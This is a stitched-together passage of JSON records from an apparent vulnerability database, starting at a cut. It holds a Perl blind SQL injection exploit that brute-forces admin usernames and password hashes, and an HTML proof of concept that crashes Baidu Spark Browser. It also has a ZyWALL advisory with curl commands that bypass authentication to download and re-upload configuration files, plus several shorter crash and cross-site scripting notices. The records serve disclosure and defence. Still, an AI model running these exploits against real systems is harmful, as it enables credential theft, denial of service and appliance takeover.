##\\n\\n\";\r\nprint \"\\t## Blind SQL Injection Exploit ##\\n\\n\"; \r\nprint \"\\t## ++Conditions: magic_quotes=OFF ##\\n\\n\";\r\nprint \"\\t## Author: Y3nh4ck3r ##\\n\\n\";\r\nprint \"\\t## Proud to be Spanish! ##\\n\\n\";\r\nprint \"\\t#######################################################\\n\\n\";\r\nprint \"\\t#######################################################\\n\\n\";\r\n#Init variables\r\nmy $host=$ARGV[0];\r\nmy $path=$ARGV[1];\r\n$numArgs = $#ARGV + 1;\r\nif($numArgs<=1) \r\n\t{\r\n\t\t&helper;\r\n\t\texit(1);\t\r\n\t}\t\r\n#Build uri\r\nmy $finalhost=\"http://\".$host.\"/\".$path.\"/index.php\";\r\n$finalrequest = $finalhost;\t\r\n#Testing blind sql injection and magic_quotes (any error?)\r\n$send_post1=\"username=%27+or+1%3D1%23&pass=1111&submit=Login\";\r\n$output1=&request($finalrequest,$send_post1);\r\n$send_post2=\"username=%27+or+1%3D0%23&pass=1111&submit=Login\";\r\n$output2=&request($finalrequest,$send_post2);\r\nif ($output1 eq $output2)\r\n{ \r\n\t#Not injectable\r\n\t&error;\r\n\texit(1); \r\n}else{ \r\n\t#blind sql injection is available\r\n\t&testedblindsql;\r\n}\r\n#Bruteforcing length\r\n$length_user=&brute_length($finalrequest);\t\r\n#Bruteforcing username...\r\n$user=&exploiting($finalrequest,$length_user,'username');\r\n#Bruteforcing password md5 hash...\r\n$pwhash=&exploiting($finalrequest,32,'password');\r\n#final checking\r\nif((!$user) || (!$pwhash)){\r\n\t&error;\r\n\texit(1);\r\n}\r\nprint \"\\n\\t\\t*************************************************\\n\";\r\nprint \"\\t\\t********* EXPLOIT EXECUTED SUCCESSFULLY ********\\n\";\r\nprint \"\\t\\t*************************************************\\n\\n\";\r\nprint \"\\t\\tAdmin-username: \".$user.\"\\n\";\r\nprint \"\\t\\tAdmin-password: \".$pwhash.\"\\n\\n\";\r\nprint \"\\n\\t\\t<<----------------------FINISH!-------------------->>\\n\\n\";\r\nexit(1);\r\n#Ok...all job done\r\n\r\n\r\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/5349"}], "cve": [{"lastseen": "2016-09-03T20:49:38", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in Baidu Spark Browser 26.5.9999.3511 allows remote attackers to cause a denial of service (application crash) via nested calls to the window.print JavaScript function.", "modified": "2014-08-20T13:36:21", "published": "2014-08-19T15:55:04", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5349", "id": "CVE-2014-5349", "type": "cve", "title": "CVE-2014-5349", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T20:11:22", "bulletinFamily": "exploit", "description": "Baidu Spark Browser 26.5.9999.3511 - Remote Stack Overflow Vulnerability (DoS). CVE-2014-5349. Dos exploit for windows platform", "modified": "2014-07-02T00:00:00", "published": "2014-07-02T00:00:00", "id": "EDB-ID:33951", "href": "https://www.exploit-db.com/exploits/33951/", "type": "exploitdb", "title": "Baidu Spark Browser 26.5.9999.3511 - Remote Stack Overflow Vulnerability DoS", "sourceData": "<!--\r\n\r\nBaidu Spark Browser v26.5.9999.3511 Remote Stack Overflow Vulnerability (DoS)\r\n\r\n\r\nVendor: Baidu, Inc.\r\nProduct web page: http://www.baidu.com\r\nAffected version: 26.5.9999.3511\r\n\r\nSummary: Spark Browser is a free Internet browser with very\r\nsharp UIs and cool utilities. It's based on the Chromium\r\ntechnology platform, giving it fast browsing capabilities.\r\n\r\nDesc: Spark Browser version 26.5.9999.3511 allows remote\r\nattackers to cause a denial of service (application crash)\r\nresulting in stack overflow via nested calls to the window.print\r\njavascript function.\r\n\r\n-----------------------------------------------------------------\r\n\r\n(153c.14f4): Stack overflow - code c00000fd (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=000000b0 ebx=003d0000 ecx=003d0000 edx=5000016b esi=00000000 edi=0000010c\r\neip=77e0decf esp=03d23000 ebp=03d230c4 iopl=0 nv up ei pl nz na po nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202\r\nntdll!memcpy+0xbb8f:\r\n77e0decf 56 push esi\r\n\r\n-----------------------------------------------------------------\r\n\r\nTested on: Microsoft Windows 7 Professional SP1 (EN)\r\n Microsoft Windows 7 Ultimate SP1 (EN)\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2014-5190\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5190.php\r\n\r\n\r\n28.06.2014\r\n\r\n-->\r\n\r\n\r\n<html>\r\n<title>Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</title>\r\n<body bgcolor=\"#50708C\">\r\n<center>\r\n<p><font color=\"#e3e3e3\">Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</font></p>\r\n<button onClick=crash()>Execute!</button>\r\n</center>\r\n<script>\r\nfunction crash(){\r\n\twindow.print();\r\n\tcrash();\r\n}\r\n</script>\r\n</body>\r\n</html>\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/33951/"}], "zeroscience": [{"lastseen": "2019-03-25T17:33:48", "bulletinFamily": "exploit", "description": "Title: Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow Vulnerability (DoS) \nAdvisory ID: [ZSL-2014-5190](<ZSL-2014-5190.php>) \nType: Local/Remote \nImpact: DoS \nRisk: (3/5) \nRelease Date: 30.06.2014 \n\n\n##### Summary\n\nSpark Browser is a free Internet browser with very sharp UIs and cool utilities. It's based on the Chromium technology platform, giving it fast browsing capabilities. \n\n##### Description\n\nSpark Browser version 26.5.9999.3511 allows remote attackers to cause a denial of service (application crash) resulting in stack overflow via nested calls to the window.print javascript function. \n\n##### Vendor\n\nBaidu, Inc. - <http://www.baidu.com>\n\n##### Affected Version\n\n26.5.9999.3511 \n\n##### Tested On\n\nMicrosoft Windows 7 Professional SP1 (EN) \nMicrosoft Windows 7 Ultimate SP1 (EN) \n\n##### Vendor Status\n\nN/A \n\n##### PoC\n\n[spark_dos.html](<../../codes/spark_dos.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <http://packetstormsecurity.com/files/127282> \n[2] <http://www.securityfocus.com/bid/68288> \n[3] <http://osvdb.org/show/osvdb/108605> \n[4] <http://www.exploit-db.com/exploits/33951/> \n[5] <http://cxsecurity.com/issue/WLB-2014070013> \n[6] <http://www.vfocus.net/art/20140701/11614.html> \n[7] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-5349>\n\n##### Changelog\n\n[30.06.2014] - Initial release \n[01.07.2014] - Added reference [1] and [2] \n[02.07.2014] - Added reference [3] and [4] \n[03.07.2014] - Added reference [5] and [6] \n[05.10.2014] - Added reference [7] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2014-06-30T00:00:00", "published": "2014-06-30T00:00:00", "id": "ZSL-2014-5190", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5190.php", "title": "Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow Vulnerability (DoS)", "type": "zeroscience", "sourceData": "REQUEST LIMIT REACHED", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/spark_dos.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:40", "bulletinFamily": "software", "description": "Advisory: Authentication Bypass in Configuration Import and Export of\r\n ZyXEL ZyWALL USG Appliances\r\n\r\nUnauthenticated users with access to the management web interface of\r\ncertain ZyXEL ZyWALL USG appliances can download and upload\r\nconfiguration files, that are applied automatically.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nProduct: ZyXEL USG (Unified Security Gateway) appliances\r\n ZyWALL USG-20\r\n ZyWALL USG-20W\r\n ZyWALL USG-50\r\n ZyWALL USG-100\r\n ZyWALL USG-200\r\n ZyWALL USG-300\r\n ZyWALL USG-1000\r\n ZyWALL USG-1050\r\n ZyWALL USG-2000\r\n Possibly other ZLD-based products\r\nAffected Versions: Firmware Releases before April 25, 2011\r\nFixed Versions: Firmware Releases from or after April 25, 2011\r\nVulnerability Type: Authentication Bypass\r\nSecurity Risk: high\r\nVendor URL: http://www.zyxel.com/\r\nVendor Status: fixed version released\r\nAdvisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2011-003\r\nAdvisory Status: published\r\nCVE: GENERIC-MAP-NOMATCH\r\nCVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH\r\n\r\n\r\nIntroduction\r\n============\r\n\r\n``The ZyWALL USG (Unified Security Gateway) Series is the "third\r\ngeneration" ZyWALL featuring an all-new platform. It provides greater\r\nperformance protection, as well as a deep packet inspection security\r\nsolution for small businesses to enterprises alike. It embodies a\r\nStateful Packet Inspection (SPI) firewall, Anti-Virus, Intrusion\r\nDetection and Prevention (IDP), Content Filtering, Anti-Spam, and VPN\r\n(IPSec/SSL/L2TP) in one box. This multilayered security safeguards your\r\norganization's customer and company records, intellectual property, and\r\ncritical resources from external and internal threats.''\r\n\r\n(From the vendor's homepage)\r\n\r\n\r\nMore Details\r\n============\r\n\r\nDuring a penetration test, a ZyXEL ZyWALL USG appliance was found and\r\ntested for security vulnerabilities. The following sections first\r\ndescribe, how the appliance's filesystem can be extracted from the\r\nencrypted firmware upgrade zip files. Afterwards it is shown, how\r\narbitrary configuration files can be up- and downloaded from the\r\nappliance. This way, a custom user account with a chosen password can\r\nbe added to the running appliance without the need of a reboot.\r\n\r\n\r\nDecrypting the ZyWALL Firmware Upgrade Files\r\n--------------------------------------------\r\n\r\nFirmware upgrade files for ZyXEL ZyWALL USG appliances consist of a\r\nregularly compressed zip file, which contains, among others, two\r\nencrypted zip files with the main firmware. For example, the current\r\nfirmware version 2.21(BQD.2) for the ZyWALL USG 20 ("ZyWALL USG\r\n20_2.21(BDQ.2)C0.zip") contains the following files:\r\n\r\n -rw-r--r-- 1 user user 43116374 Sep 30 2010 221BDQ2C0.bin\r\n -rw-r--r-- 1 user user 7354 Sep 30 2010 221BDQ2C0.conf\r\n -rw-r--r-- 1 user user 28395 Sep 30 2010 221BDQ2C0.db\r\n -rw-r--r-- 1 user user 703402 Oct 12 17:48 221BDQ2C0.pdf\r\n -rw-r--r-- 1 user user 3441664 Sep 30 2010 221BDQ2C0.ri\r\n -rw-r--r-- 1 user user 231 Sep 30 2010 firmware.xml\r\n\r\nThe files 221BDQ2C0.bin and 221BDQ2C0.db are encrypted zip files that\r\nrequire a password for decompression. Listing the contents is\r\npossible:\r\n\r\n $ unzip -l 221BDQ2C0.bin\r\n Archive: 221BDQ2C0.bin\r\n Length Date Time Name\r\n --------- ---------- ----- ----\r\n 40075264 2010-09-15 06:32 compress.img\r\n 0 2010-09-30 04:48 db/\r\n 0 2010-09-30 04:48 db/etc/\r\n 0 2010-09-30 04:48 db/etc/zyxel/\r\n 0 2010-09-30 04:48 db/etc/zyxel/ftp/\r\n 0 2010-09-30 04:48 db/etc/zyxel/ftp/conf/\r\n 20 2010-09-14 14:46 db/etc/zyxel/ftp/conf/htm-default.conf\r\n 7354 2010-09-14 14:46 db/etc/zyxel/ftp/conf/system-default.conf\r\n 0 2010-09-30 04:48 etc_writable/\r\n 0 2010-09-30 04:48 etc_writable/budget/\r\n 0 2010-09-14 15:08 etc_writable/budget/budget.conf\r\n 0 2010-09-15 06:28 etc_writable/firmware-upgraded\r\n 81 2010-09-14 15:09 etc_writable/myzyxel_info.conf\r\n 243 2010-09-14 15:03 etc_writable/tr069ta.conf\r\n 0 2010-09-30 04:48 etc_writable/zyxel/\r\n 0 2010-09-30 04:48 etc_writable/zyxel/conf/\r\n 996 2010-09-15 06:28 etc_writable/zyxel/conf/__eps_checking_default.xml\r\n 42697 2010-09-14 14:46 etc_writable/zyxel/conf/__system_default.xml\r\n 95 2010-09-30 04:48 filechecksum\r\n 1023 2010-09-30 04:48 filelist\r\n 336 2010-09-30 04:48 fwversion\r\n 50 2010-09-15 06:34 kernelchecksum\r\n 3441664 2010-09-30 04:48 kernelusg20.bin\r\n 0 2010-09-14 14:46 wtp_image/\r\n --------- -------\r\n 43569823 24 files\r\n\r\n $ unzip -l 221BDQ2C0.db\r\n Archive: 221BDQ2C0.db\r\n Length Date Time Name\r\n --------- ---------- ----- ----\r\n 0 2009-07-29 04:44 db_remove_lst\r\n 0 2010-09-15 06:28 etc/\r\n 0 2010-09-15 06:35 etc/idp/\r\n 39 2010-09-14 16:08 etc/idp/all.conf\r\n 25 2010-09-14 16:08 etc/idp/attributes.txt\r\n 639 2010-09-14 16:08 etc/idp/attributes_self.txt\r\n 277 2010-09-14 16:08 etc/idp/device.conf\r\n 39 2010-09-14 16:08 etc/idp/dmz.conf\r\n 39 2010-09-14 16:08 etc/idp/lan.conf\r\n 39 2010-09-14 16:08 etc/idp/none.conf\r\n 60581 2010-09-14 16:08 etc/idp/self.ref\r\n 5190 2010-09-14 16:08 etc/idp/self.rules\r\n 0 2010-09-14 16:08 etc/idp/update.ref\r\n 0 2010-09-14 16:08 etc/idp/update.rules\r\n 39 2010-09-14 16:08 etc/idp/wan.conf\r\n 445075 2010-09-14 16:08 etc/idp/zyxel.ref\r\n 327 2010-09-14 16:08 etc/idp/zyxel.rules\r\n 0 2010-09-14 16:05 etc/zyxel/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/.dha/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/.dha/dha_idp/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/cert/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/cert/trusted/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/conf/\r\n 20 2010-09-14 14:46 etc/zyxel/ftp/conf/htm-default.conf\r\n 7354 2010-09-14 14:46 etc/zyxel/ftp/conf/system-default.conf\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/dev/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/idp/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/packet_trace/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/script/\r\n 1256 2010-09-15 06:35 filelist\r\n --------- -------\r\n 520939 31 files\r\n\r\nDuring a penetration test it was discovered that the file\r\n"221BDQ2C0.conf" (from the unencrypted firmware zip file) has exactly\r\nthe same size as the file "system-default.conf" contained in each\r\nencrypted zip. This can be successfully used for a known-plaintext\r\nattack[1] against these files, afterwards the decrypted zip-files can be\r\nextracted. However, please note that this attack only allows decrypting\r\nthe encrypted zip files, the password used for encrypting the files in\r\nthe first place is not revealed.\r\n\r\nAmong others, the following programs implement this attack:\r\n\r\n * PkCrack by Peter Conrad [2]\r\n * Elcomsoft Advanced Archive Password Recovery [3]\r\n\r\nAfterwards, the file "compress.img" from "221BDQ2C0.bin" can be\r\ndecompressed (e.g. by using the program "unsquashfs"), revealing the\r\nfilesystem for the appliance.\r\n\r\n\r\nWeb-Interface Authentication Bypass\r\n-----------------------------------\r\n\r\nZyWALL USG appliances can be managed over a web-based administrative\r\ninterface offered by an Apache http server. The interface requires\r\nauthentication prior to any actions, only some static files can be\r\nrequested without authentication.\r\n\r\nA custom Apache module "mod_auth_zyxel.so" implements the\r\nauthentication, it is configured in etc/service_conf/httpd.conf in the\r\nfirmware (see above). Several Patterns are configured with the directive\r\n"AuthZyxelSkipPattern", all URLs matching one of these patterns can be\r\naccessed without authentication:\r\n\r\n AuthZyxelSkipPattern /images/ /weblogin.cgi /I18N.js /language\r\n\r\nThe administrative interface consists of several programs which are\r\ncalled as CGI scripts. For example, accessing the following URL after\r\nlogging in with an admin account delivers the current startup\r\nconfiguration file:\r\n\r\n https://192.168.0.1/cgi-bin/export-cgi?category=config&arg0=startup-config.conf\r\n\r\nThe Apache httpd in the standard configuration allows appending\r\narbitrary paths to CGI scripts. The server saves the extra path in the\r\nenvironment variable PATH_INFO and executes the CGI script (this can be\r\ndisabled by setting "AcceptPathInfo" to "off"[4]). Therefore, appending\r\nthe string "/images/" and requesting the following URL also executes the\r\n"export-cgi" script and outputs the current configuration file:\r\n\r\n https://192.168.0.1/cgi-bin/export-cgi/images/?category=config&arg0=startup-config.conf\r\n\r\nDuring the penetration test it was discovered that for this URL, no\r\nauthentication is necessary (because the string "/images/" is included\r\nin the path-part of the URL) and arbitrary configuration files can be\r\ndownloaded. The file "startup-config.conf" can contain sensitive data\r\nlike firewall rules and hashes of user passwords. Other interesting\r\nconfig-file names are "lastgood.conf" and "systemdefault.conf".\r\n\r\nThe administrative interface furthermore allows uploading of\r\nconfiguration files with the "file_upload-cgi" script. Applying the\r\nsame trick (appending "/images/"), arbitrary configuration files can be\r\nuploaded without any authentication. When the chosen config-file name\r\nis set to "startup-config.conf", the appliance furthermore applies all\r\nsettings directly after uploading. This can be used to add a second\r\nadministrative user with a self-chosen password and take over the\r\nappliance.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nThe current startup-config.conf file from a ZyWALL USG appliance can be\r\ndownloaded by accessing the following URL, e.g. with the program cURL:\r\n\r\n $ curl --silent -o startup-config.conf \\r\n "https://192.168.0.1/cgi-bin/export-cgi/images/?category=config&arg0=startup-config.conf"\r\n\r\nThis file can be re-uploaded (e.g. after adding another administrative\r\nuser) with the following command, the parameter "ext-comp-1121" may need\r\nto be adjusted:\r\n\r\n $ curl --silent -F ext-comp-1121=50 -F file_type=config -F nv=1 \\r\n -F "file_path=@startup-config.conf;filename=startup-config.conf" \\r\n https://192.168.0.1/cgi-bin/file_upload-cgi/images/\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nIf possible, disable the web-based administrative interface or else\r\nensure that the interface is not exposed to attackers.\r\n\r\n\r\nFix\r\n===\r\n\r\nUpgrade to a firmware released on or after April 25, 2011.\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nAny attackers who are able to access the administrative interface of\r\nvulnerable ZyWALL USG appliances can read and write arbitrary configuration\r\nfiles, thus compromising the complete appliance. Therefore the risk is\r\nestimated as high.\r\n\r\n\r\nHistory\r\n=======\r\n\r\n2011-03-07 Vulnerability identified\r\n2011-04-06 Customer approved disclosure to vendor\r\n2011-04-07 Vendor notified\r\n2011-04-07 First reactions of vendor, issue is being investigated\r\n2011-04-08 Meeting with vendor\r\n2011-04-15 Vulnerability fixed by vendor\r\n2011-04-18 Test appliance and beta firmware supplied to\r\n RedTeam Pentesting, fix verified\r\n2011-04-25 Vendor released new firmwares with fix\r\n2011-04-29 Vendor confirms that other ZLD-based devices may also be\r\n affected\r\n2011-05-04 Advisory released\r\n\r\nRedTeam Pentesting likes to thank ZyXEL for the fast response and\r\nprofessional collaboration.\r\n\r\n\r\nReferences\r\n==========\r\n\r\n[1] ftp://utopia.hacktic.nl/pub/crypto/cracking/pkzip.ps.gz\r\n[2] http://www.unix-ag.uni-kl.de/~conrad/krypto/pkcrack.html\r\n[3] http://www.elcomsoft.com/archpr.html\r\n[4] http://httpd.apache.org/docs/2.0/mod/core.html#acceptpathinfo\r\n\r\n\r\nRedTeam Pentesting GmbH\r\n=======================\r\n\r\nRedTeam Pentesting offers individual penetration tests, short pentests,\r\nperformed by a team of specialised IT-security experts. Hereby, security\r\nweaknesses in company networks or products are uncovered and can be\r\nfixed immediately.\r\n\r\nAs there are only few experts in this field, RedTeam Pentesting wants to\r\nshare its knowledge and enhance the public knowledge with research in\r\nsecurity related areas. The results are made available as public\r\nsecurity advisories.\r\n\r\nMore information about RedTeam Pentesting can be found at\r\nhttp://www.redteam-pentesting.de.\r\n\r\n\r\n-- \r\nRedTeam Pentesting GmbH Tel.: +49 241 963-1300\r\nDennewartstr. 25-27 Fax : +49 241 963-1304\r\n52068 Aachen http://www.redteam-pentesting.de/\r\nGermany Registergericht: Aachen HRB 14004\r\nGeschäftsführer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck", "modified": "2011-05-05T00:00:00", "published": "2011-05-05T00:00:00", "id": "SECURITYVULNS:DOC:26302", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26302", "title": "[RT-SA-2011-003] Authentication Bypass in Configuration Import and Export of ZyXEL ZyWALL USG Appliances", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:14", "bulletinFamily": "software", "description": "Hi!\r\n\r\nI am using LICQ and when I want to establish a direct connection to Trillian using the ICQ protocol and\r\na reverse connection is requested, Trillian crashes reproducable:\r\n\r\n08:12:36: [TCP] Sending message to xxx (#1).\r\n08:12:36: [PKT] Packet (SRVv0, 38 bytes) sent:\r\n (192.168.0.10:46810 -> 64.12.24.112:5190)\r\n 0000: 2A 02 06 A6 00 20 00 04 00 14 00 00 00 00 00 1F *..\u00a6. ..........\r\n 0010: 00 00 00 00 00 00 00 00 00 01 09 31 32 30 36 38 ...........12068\r\n 0020: 31 35 34 35 00 00 1545..\r\n08:12:36: [TCP] Requesting reverse connection from xxx.\r\n08:12:36: [PKT] Packet (SRVv0, 107 bytes) sent:\r\n (192.168.0.10:46810 -> 64.12.24.112:5190)\r\n 0000: 2A 02 06 A7 00 65 00 04 00 06 00 00 00 00 00 20 *..\u00a7.e.........\r\n 0010: 00 00 00 00 00 00 00 20 00 02 09 31 32 30 36 38 ....... ...12068\r\n 0020: 31 35 34 35 00 05 00 43 00 00 00 00 00 00 00 00 1545...C........\r\n 0030: 00 20 09 46 13 44 4C 7F 11 D1 82 22 44 45 53 54 . .F.DL..\u0421."DEST\r\n 0040: 00 00 00 0A 00 02 00 01 00 0F 00 00 27 11 00 1B ............'...\r\n 0050: 8B 7F 2A 00 3E B2 2D CF A0 0F 00 00 04 0A 04 00 ..*.>\u0406-\u041f .......\r\n 0060: 00 A0 0F 00 00 08 00 20 00 00 00 . ..... ...\r\n08:12:48: [PKT] Packet (SRVv0, 40 bytes) received:\r\n (192.168.0.10:46810 <- 64.12.24.112:5190)\r\n 0000: 2A 02 53 BF 00 22 00 03 00 0C 00 00 8C F4 C9 18 *.S\u0457.".......\u0444\u0419.\r\n 0010: 09 31 32 30 36 38 31 35 34 35 00 00 00 02 00 01 .120681545......\r\n 0020: 00 02 00 00 00 1D 00 00 ........\r\n08:12:48: [SRV] xxx went offline.\r\n\r\nSeems that Trillian is having a problem with these reverse direct connections. I tested it recently\r\nwith the latest Trillian 3.0.\r\n\r\nThe crash was firstly reported to Cerulan Studios in their Bug Forum in January:\r\nhttp://ceruleanstudios.com/forums/showthread.php?s=84987af3601384b1dc7ea1f36b237c9c&threadid=64889\r\n\r\nThanks\r\nPhilipp Kolmann\r\n\r\nPS: Please Cc me, since I am not subscribed on the list.", "modified": "2005-10-04T00:00:00", "published": "2005-10-04T00:00:00", "id": "SECURITYVULNS:DOC:9854", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:9854", "title": "Trillian remote crashable", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:20", "bulletinFamily": "software", "description": "Buffer overflow on the links with international domain names (IDN).", "modified": "2005-09-10T00:00:00", "published": "2005-09-10T00:00:00", "id": "SECURITYVULNS:VULN:5190", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:5190", "title": "Netscape / Mozilla / Firefox buffer overflow", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:17", "bulletinFamily": "software", "description": "Rpbolem with stack corruption, uninitialized memory references.", "modified": "2005-06-14T00:00:00", "published": "2005-06-14T00:00:00", "id": "SECURITYVULNS:VULN:3151", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:3151", "title": "Multiple bugs in OpenSSL", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:13", "bulletinFamily": "software", "description": "\r\n----------------------------------------------------------------------\r\n\r\nBist Du interessiert an einem neuen Job in IT-Sicherheit?\r\n\r\n\r\nSecunia hat zwei freie Stellen als Junior und Senior Spezialist in IT-\r\nSicherheit:\r\nhttp://secunia.com/secunia_vacancies/\r\n\r\n----------------------------------------------------------------------\r\n\r\nTITLE:\r\nFreeStyle Wiki Attachments Script Insertion Vulnerability\r\n\r\nSECUNIA ADVISORY ID:\r\nSA15538\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/15538/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nCross Site Scripting\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nFSWikiLite 0.x\r\nhttp://secunia.com/product/5190/\r\nFreeStyle Wiki 3.x\r\nhttp://secunia.com/product/5189/\r\n\r\nDESCRIPTION:\r\nA vulnerability has been reported in FreeStyle Wiki and FSWikiLite,\r\nwhich can be exploited by malicious people to conduct script\r\ninsertion attacks.\r\n\r\nInput passed in uploaded attachments is not properly sanitised before\r\nbeing used. This can be exploited to inject arbitrary HTML and script\r\ncode, which will be executed in a user's browser session in context\r\nof an affected site when the malicious attachment is viewed.\r\n\r\nThe vulnerability has been reported in FreeStyle Wiki 3.5.7 and\r\nFSWikiLite 0.0.10. Prior versions may also be affected.\r\n\r\nSOLUTION:\r\nFreeStyle Wiki:\r\nUpdate to version 3.5.8.\r\nhttps://sourceforge.jp/projects/fswiki/files/?release_id=14798#14798\r\n\r\nFSWikiLite:\r\nUpdate to version 0.0.11.\r\nhttps://sourceforge.jp/projects/fswiki/files/?release_id=14800#14800\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nReported by vendor.\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2005-06-01T00:00:00", "published": "2005-06-01T00:00:00", "id": "SECURITYVULNS:DOC:8765", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:8765", "title": "[SA15538] FreeStyle Wiki Attachments Script Insertion Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "description": "===RUS\r\n\u041f\u0440\u0438 \u0434\u043b\u0438\u043d\u043d\u043e\u043c \u0437\u0430\u043f\u0440\u043e\u0441\u0435 \u043d\u0430 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u044e \u0441\u0442\u0430\u0440\u043e\u0433\u043e \u043e\u0431\u0440\u0430\u0437\u0446\u0430 &RQ \u043b\u044e\u0431\u043e\u0439\r\n\u0432\u0435\u0440\u0441\u0438\u0438 \u0432\u044b\u0434\u0430\u0435\u0442 \u043c\u043d\u043e\u0433\u043e\r\n\u043e\u0448\u0438\u0431\u043e\u043a, \u0432 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u043b\u0443\u0447\u0430\u044f\u0445 \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u043f\u0435\u0440\u0435\u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u0430. \u041f\u043e\u0441\u043b\u0435\r\n\u0440\u0430\u0437\u0433\u043e\u0432\u043e\u0440\u0430 \u0441 Rejetto, \u043e\u043d \u043f\u0440\u0438\u0441\u043b\u0430\u043b \u0444\u0430\u0439\u043b \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0439\r\n\u0437\u0430\u043a\u0440\u044b\u0432\u0430\u0435\u0442\r\n\u044d\u0442\u0443 \u0431\u0440\u0435\u0448\u044c.\r\nicq #7000000\r\nrdm-yandex@nnm.ru\r\n\u0441 \u0443\u0432\u0430\u0436\u0435\u043d\u0438\u0435\u043c, RdM-[YanDeX]\r\n\r\n===ENG\r\nAffected: &RQ all versions.\r\n&RQ crashes if long old-type authorization request sent. Rejetto\r\ngave\r\nme solution as non-vulnerable andrq.ini file. Exploit attached,\r\nplease\r\nuse it carefully, sometimes some client-side files can be damaged.\r\n\r\ncontacts:\r\nicq #7000000\r\nrdm-yandex@nnm.ru\r\nregards, 